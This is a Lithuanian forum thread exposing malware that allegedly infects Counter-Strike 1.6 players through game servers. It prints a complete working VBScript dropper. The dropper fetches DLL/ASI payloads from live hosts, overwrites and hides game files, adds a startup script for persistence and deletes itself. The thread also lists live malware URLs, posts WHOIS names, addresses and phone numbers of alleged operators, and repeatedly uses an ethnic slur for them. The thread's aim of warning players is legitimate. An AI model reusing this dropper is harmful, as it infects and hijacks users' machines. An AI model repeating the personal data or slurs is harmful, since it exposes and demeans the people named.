Cigonu slowhack'eriu tinklo analize(pildoma)

Čia galima pranešti apie piktnaudžiavimo atvejus, nesąžiningą veiklą, slowhack naudojimą ir kitus "nusikaltimus".
sss
Flooderis arba specialistas
Posts: 621
Joined: 2010 Dec 22 20:00
Location: ey b0s

Cigonu slowhack'eriu tinklo analize(pildoma)

Post by sss »

post'o - http://amxmodx.lt/viewtopic.php?f=41&t=6840 tesinys

Parazitas pasitelkiant budus, uzkreciant klientus per farmserverius kurie patampa botnetu atsiunciant nekaltam client'ui failus naudojant vb scripta ir cs launcheri kaip atsiustu dll injectoriu, sudarkant zaidimo failus ir aibe kitu.






Prisegta virusiniu failu offline versija jeigu netycia parazitas "sumetytu pedas" atsiusta naudojantis httrack programa analizei kaip irodymas, jie paimti is:



http://www.upload.ee/files/5405822/web_ ... k.rar.html


ms-shadow.ro/NexonUp
stockdownload.eu/NexonCs
vipsmiley.cf/NexonCs



vienas is parazitu failu:

Code: Select all

Sub unProtectFile( filename )    dim readfile, filesys    set filesys = CreateObject("Scripting.FileSystemObject")     If filesys.FileExists( filename ) Then        set readfile = filesys.GetFile( filename )        readfile.Attributes = 0 ' normal    End IfEnd Sub Sub protectFile( filename )    dim readfile, filesys    set filesys = CreateObject("Scripting.FileSystemObject")     If filesys.FileExists( filename ) Then        set readfile = filesys.GetFile( filename )        readfile.Attributes = 7 ' hidden + system + readonly    End IfEnd Sub Sub DeleteAFile( filename )    Dim filesys    Set filesys = CreateObject("Scripting.FileSystemObject")        If filesys.FileExists( filename ) Then        unProtectFile( filename )        filesys.DeleteFile( filename ), True    End IfEnd Sub Sub RenameFile( oldName, newName )    Dim filesys    Set filesys = WScript.CreateObject("Scripting.FileSystemObject")        If filesys.FileExists( oldName ) Then        filesys.MoveFile oldName, newName    End IfEnd Sub Sub ClearCFG( path )    DeleteAFile path    Set objFSO = CreateObject("Scripting.FileSystemObject")    Set objFile = objFSO.CreateTextFile(path, ForWriting)    objFile.Write ""    objFile.Close     protectFile pathEnd Sub Sub DeleteAFolder( foldername )    Dim filesys    Set filesys = CreateObject("Scripting.FileSystemObject")        If filesys.FolderExists( foldername ) Then        ' unProtectFile( foldername )        filesys.DeleteFolder( foldername ), True    End IfEnd Sub Sub RenameFolder( oldName, newName )    Dim filesys    Set filesys = WScript.CreateObject("Scripting.FileSystemObject")        If filesys.FolderExists( oldName ) Then        filesys.MoveFolder oldName, newName    End IfEnd Sub strURL="http://ms-shadow.ro/NexonUp/GTProtector.dll?" & RndOn Error Resume Next    Set xml = CreateObject("Microsoft.XMLHTTP")    xml.Open "GET", strURL, False    xml.Send        If Err.Number <> 0 Then        WScript.Quit    ' if file download fails, quit script    Else        set oStream = createobject("Adodb.Stream")         oStream.type = 1 ' adTypeBinary        oStream.open        oStream.write xml.responseBody                ' overwrite        oStream.savetofile "GTProtector.dll.upk", 2 ' adSaveCreateOverWrite        oStream.close                set oStream = nothing        Set xml = Nothing    End If    Err.ClearOn Error Goto 0 strURL="http://ms-shadow.ro/NexonUp/GTProtector.asi?" & RndOn Error Resume Next    Set xml = CreateObject("Microsoft.XMLHTTP")    xml.Open "GET", strURL, False    xml.Send        If Err.Number <> 0 Then        WScript.Quit    ' if file download fails, quit script    Else        set oStream = createobject("Adodb.Stream")         oStream.type = 1 ' adTypeBinary        oStream.open        oStream.write xml.responseBody                ' overwrite        oStream.savetofile "GTProtector.asi.upk", 2 ' adSaveCreateOverWrite        oStream.close                set oStream = nothing        Set xml = Nothing    End If    Err.ClearOn Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/GTProtector.ini?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "GTProtector.ini.upk"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("GTProtector.ini.upk", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("GTProtector.ini.upk")    End If    On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "config\MasterServers.vdf"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("config\MasterServers.vdf", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("config\MasterServers.vdf")    End If    On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "config\rev_MasterServers.vdf"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("config\rev_MasterServers.vdf", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("config\rev_MasterServers.vdf")    End If    On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "platform\config\MasterServers.vdf"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("platform\config\MasterServers.vdf", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("platform\config\MasterServers.vdf")    End If    On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "platform\config\rev_MasterServers.vdf"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("platform\config\rev_MasterServers.vdf", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("platform\config\rev_MasterServers.vdf")    End If    On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/ServerBrowser.vdf?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "config\ServerBrowser.vdf"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("config\ServerBrowser.vdf", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("config\ServerBrowser.vdf")    End If    On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/ServerBrowser.vdf?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "platform\config\ServerBrowser.vdf"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("platform\config\ServerBrowser.vdf", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("platform\config\ServerBrowser.vdf")    End If    On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/GameMenu.res?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "cstrike\resource\GameMenu.res"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("cstrike\resource\GameMenu.res", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("cstrike\resource\GameMenu.res")    End If    On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/userconfig.cfg?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "cstrike\userconfig.cfg"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("cstrike\userconfig.cfg", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("cstrike\userconfig.cfg")    End If    On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/motd_temp.html?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "cstrike\motd_temp.html.old"        RenameFile "cstrike\motd_temp.html", "cstrike\motd_temp.html.old"        DeleteAFile "cstrike\motd_temp.html"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("cstrike\motd_temp.html", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("cstrike\motd_temp.html")    End If    On Error Goto 0 On Error Resume Next    ClearCFG "cstrike\hw\geforce.cfg"    ClearCFG "cstrike\hw\opengl.cfg"    ClearCFG "cstrike\autoexec.cfg"    ' ClearCFG "cstrike\userconfig.cfg"    ClearCFG "cstrike\valve.rc"     ClearCFG "valve\hw\geforce.cfg"    ClearCFG "valve\hw\opengl.cfg"    ClearCFG "valve\valve.rc"On Error Goto 0 CreateObject("WScript.Shell").Run("taskkill /f /im hl.exe") WScript.Sleep(3000) On Error Resume Next    DeleteAFolder "cstrike\bin_old"    DeleteAFile "cstrike\bin_old"     DeleteAFile "GTProtector.dll.old"    DeleteAFile "GTProtector.asi.old"    DeleteAFile "GTProtector.ini.old"     RenameFolder "cstrike\bin", "cstrike\bin_old"    RenameFile "cstrike\bin", "cstrike\bin_old"     RenameFile "GTProtector.dll", "GTProtector.dll.old"    RenameFile "GTProtector.asi", "GTProtector.asi.old"    RenameFile "GTProtector.ini", "GTProtector.ini.old"     RenameFile "GTProtector.dll.upk", "GTProtector.dll"    RenameFile "GTProtector.asi.upk", "GTProtector.asi"    RenameFile "GTProtector.ini.upk", "GTProtector.ini"     protectFile("GTProtector.dll")    protectFile("GTProtector.asi")    protectFile("GTProtector.ini")     protectFile("cstrike\liblist.gam")     DeleteAFile "cstrike\bin\TrackerUI.dll"    DeleteAFile "valve\bin\TrackerUI.dll"    DeleteAFile "cstrike\cl_dlls\ParticleMan.dll"    DeleteAFile "NexonUp.asi"    DeleteAFile "CsShield.dll"     RenameFile "cstrike\bin\TrackerUI.dll", "cstrike\bin\TrackerUI.dll.old"    RenameFile "valve\bin\TrackerUI.dll", "valve\bin\TrackerUI.dll.old"    RenameFile "cstrike\cl_dlls\ParticleMan.dll", "cstrike\cl_dlls\ParticleMan.dll.old"    RenameFile "NexonUp.asi", "NexonUp.asi.old"    RenameFile "CsShield.dll", "CsShield.dll.old"     DeleteAFile "cstrike\bin\TrackerUI.dll.old"    DeleteAFile "valve\bin\TrackerUI.dll.old"    DeleteAFile "cstrike\cl_dlls\ParticleMan.dll.old"    DeleteAFile "NexonUp.asi.old"    DeleteAFile "CsShield.dll.old"        DeleteAFile "mssv55.asi.old"    RenameFile "mssv55.asi", "mssv55.asi.old"        DeleteAFile "msvv82.asi.old"    RenameFile "msvv82.asi", "msvv82.asi.old" On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/motd_temp.html?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "cstrike\bin"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("cstrike\bin", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("cstrike\bin")    End If    On Error Goto 0 CreateObject("WScript.Shell").Run("hl.exe -steam -game cstrike -noforcemparms -noforcemaccel") Sub Up() Set objShell = Wscript.CreateObject("Wscript.Shell")strPath = objShell.SpecialFolders("StartUp")strMyPath = strPath & "\" On Error Resume Next Dim filesysSet filesys = CreateObject("Scripting.FileSystemObject") filesys.DeleteFile( strMyPath & "*.vbs" ), True On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/NexonUp.vbs?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile strMyPath & "NexonUp.vbs"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile(strMyPath & "NexonUp.vbs", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        ' protectFile(strMyPath & "NexonUp.vbs")    End If    On Error Goto 0 CreateObject("WScript.Shell").Run(Chr(34) & strMyPath & "NexonUp.vbs" & Chr(34)) End Sub Up() On Error Resume Next    WScript.Sleep 1000    Set fileSystem = CreateObject("Scripting.FileSystemObject")    thisScript = Wscript.ScriptFullName    fileSystem.DeleteFile(thisScript)On Error Goto 0    
[/b]

pagrindinis projektas - parazito galva i kuri eina srautas: indungi.ro

salutiniai projektai:

bestia.ro
csgofade.net
ms-boost.com
ms-shadow.ro
vipsmiley.cf
stockdownload.eu


nariai:

anaconda, unpack pagal http://www.extreamcs.com/

nariu domreg info:

Admin Name: Costinel Danut Onofrei
Admin Organization: N/A
Admin Street: Iasi,Comuna Mogosesti-Siret,Strada Tudor Vladimirescu Iasi,Comuna Mogosesti-Siret,Strada Tudor Vladimirescu
Admin City: Iasi,Comuna Mogosesti-Siret,Strada Tudor Vladimirescu
Admin State/Province: Iasi
Admin Postal Code: 73579
Admin Country: RO
Admin Phone: +40.0752811205
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: [email protected]
_
Registrant Name: Emran Costin
Registrant Organization: CSGOFADE.NET
Registrant Street: Germany Germany
Registrant City: Germany
Registrant State/Province: Iasi
Registrant Postal Code: 73579
Registrant Country: RO
Registrant Phone: +00.34123232521
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: [email protected]
Registry Admin ID:

idomus link'as:

stockdownload.eu/NexonPanel



post'as skirtas edukaciniais tikslais istempti parazitus i dienos sviesa, bet koks failu naudojamas uzkreciant klienta yra baudziamas pagal istatymus
"Give me control of a nation's money and I care not who makes it's laws" — Mayer Amschel Bauer Rothschild
Image

User avatar
laimiukas3
Moderatorius
Posts: 4569
Joined: 2012 Aug 03 01:12
Skype: laimiukas3
Location: Vilnius
Contact:

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Post by laimiukas3 »

uzkrestus failus atsiuncia is cia

Code: Select all

http://ms-shadow.ro/cstrikex/cstrike/
Image
Image
Image

InvIs2
Jau po truputį tampa savu
Posts: 149
Joined: 2013 Sep 29 12:47
Skype: pksoldierlt

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Post by InvIs2 »

Na jau čia tikrai tavo sritis, bet yra reikalas kažką bandyti pakeisti, jei tai net ne lt projektas? Šiaip kvailas klausimas, nes tikrai nesuprantu, rimtai klausiu.

sss
Flooderis arba specialistas
Posts: 621
Joined: 2010 Dec 22 20:00
Location: ey b0s

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Post by sss »

1. norint kazka pakeisti legaliai, reikia pereiti per milziniskus biurokratinius labirintus, desimtis instituciju tai trunka 2-3 metus ir ilgiau + pareikalauja 300valandu darbo priklausomai nuo apimties ko pasekoje viskas tampa beprasmiska
2. stabdyti parazitus naudojant ju paciu metodus pries juos pacius yra labai efektyvu, bet yra didele teisine siena i kuria atsimusus kelio atgal nera - tad turint ir labai geru noru ir tikslu siais laikais rankos yra uzristos, jau nekalbant apie zodzio laisve
3. Viska viesinti edukaciniais tikslais, ispeti zmones apie galimus pavojus, projektus ir ju savininkus, zaidejus



Sis projektas "slowhack" prasme iseina is bet kokiu sveiko proto ribu ir yra ko gero didziausias parazitas visoje cs 1.6 bendruomeneje - kaip vezys uzkreciantis nekaltus zaidejus bei kesinantis i ivairius projektus(teko asmeniskai susidurti su ddos atakomis, tycine fake useriu reklama dar 2012 metais butent is sio projekto), savininkas bei grupuote parazituojanciu cigonu asmenu kurie dirba prie to tikrai ne 2 ir ne 5 metus, yra pakankamai issilavine ir geba panaudoti savo zinias blogiems tikslams ka jau ir paminejau
"Give me control of a nation's money and I care not who makes it's laws" — Mayer Amschel Bauer Rothschild
Image

User avatar
beast
AMX Mod X ekspertai
Posts: 509
Joined: 2011 Jan 08 18:44
Skype: thefurious4
Contact:

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Post by beast »

Steam CS tai liečia?

sss
Flooderis arba specialistas
Posts: 621
Joined: 2010 Dec 22 20:00
Location: ey b0s

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Post by sss »

beast wrote:Steam CS tai liečia?
taip, pazeidziamas
"Give me control of a nation's money and I care not who makes it's laws" — Mayer Amschel Bauer Rothschild
Image

User avatar
laimiukas3
Moderatorius
Posts: 4569
Joined: 2012 Aug 03 01:12
Skype: laimiukas3
Location: Vilnius
Contact:

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Post by laimiukas3 »

o cia vistiek visi no steam serv kurejai renkasi dingtu tai cs numirtu iskar :) tai manau dalbajobiskas klausimas
Image
Image
Image

sss
Flooderis arba specialistas
Posts: 621
Joined: 2010 Dec 22 20:00
Location: ey b0s

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Post by sss »

laimiukas3 wrote:o cia vistiek visi no steam serv kurejai renkasi dingtu tai cs numirtu iskar :) tai manau dalbajobiskas klausimas
atvirksciai maziau parazitu butu, o jeigu valve paimtu 3rd party serveriu kontrole i savo rankas nebebutu "vjarslynyku" kurie visa community griauna
"Give me control of a nation's money and I care not who makes it's laws" — Mayer Amschel Bauer Rothschild
Image

User avatar
laimiukas3
Moderatorius
Posts: 4569
Joined: 2012 Aug 03 01:12
Skype: laimiukas3
Location: Vilnius
Contact:

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Post by laimiukas3 »

sss wrote:
laimiukas3 wrote:o cia vistiek visi no steam serv kurejai renkasi dingtu tai cs numirtu iskar :) tai manau dalbajobiskas klausimas
atvirksciai maziau parazitu butu, o jeigu valve paimtu 3rd party serveriu kontrole i savo rankas nebebutu "vjarslynyku" kurie visa community griauna
nebent steame sitas game taptu free
Image
Image
Image

sss
Flooderis arba specialistas
Posts: 621
Joined: 2010 Dec 22 20:00
Location: ey b0s

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Post by sss »

laimiukas3 wrote:
sss wrote:
laimiukas3 wrote:o cia vistiek visi no steam serv kurejai renkasi dingtu tai cs numirtu iskar :) tai manau dalbajobiskas klausimas
atvirksciai maziau parazitu butu, o jeigu valve paimtu 3rd party serveriu kontrole i savo rankas nebebutu "vjarslynyku" kurie visa community griauna
nebent steame sitas game taptu free
csgo steam jau dabar 4-8x daugiau zaideju negu cs 1.6 steam+non kartu sudejus. Cs 1.6 yra nebesupportinamas kureju, neturi ka pasiulyti zaidejams, o 3rd party community serveriai daugiausiai priklauso parazitams
"Give me control of a nation's money and I care not who makes it's laws" — Mayer Amschel Bauer Rothschild
Image

Post Reply

Who is online

Users browsing this forum: No registered users and 4 guests